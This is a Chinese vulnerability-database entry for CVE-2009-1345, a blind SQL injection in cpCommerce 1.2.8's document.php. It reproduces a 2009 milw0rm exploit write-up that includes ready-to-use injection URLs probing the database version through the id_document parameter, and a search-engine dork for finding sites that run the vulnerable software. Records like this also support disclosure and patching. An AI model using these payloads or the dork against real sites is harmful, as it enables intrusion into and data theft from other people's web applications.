cpCommerce 'document.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117598 漏洞类型 SQL注入
发布时间 2009-04-16 更新时间 2009-04-28
CVE编号 CVE-2009-1345 CNNVD-ID CNNVD-200904-385
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8455
https://cxsecurity.com/issue/WLB-2009040208
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-385
|漏洞详情
cpCommerce1.2.8版本中的document.php存在SQL注入漏洞。远程攻击者可以借助id_document参数,执行任意的SQL指令。
|漏洞EXP
==========================================================================================


  [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

       Software : cpCommerce version 1.2.8
       Vendor   : http://cpcommerce.cpradio.org/
       Download : http://cpcommerce.cpradio.org/downloads.php
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==========================================================================================


  [o] Vulnerable file

       document.php



  [o] Exploit

       http://localhost/[path]/document.php?id_document=[SQL]
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5



  [o] Dork

       "Powered by cpcommerce"


==========================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
       Special for Vrs-hCk [ thx cuy.. :p ]

        
==========================================================================================

# milw0rm.com [2009-04-16]
|参考资料

来源:XF
名称:cpcommerce-document-sql-injection(49901)
链接:http://xforce.iss.net/xforce/xfdb/49901
来源:SECTRACK
名称:1022082
链接:http://www.securitytracker.com/id?1022082
来源:BID
名称:34556
链接:http://www.securityfocus.com/bid/34556
来源:MILW0RM
名称:8455
链接:http://www.milw0rm.com/exploits/8455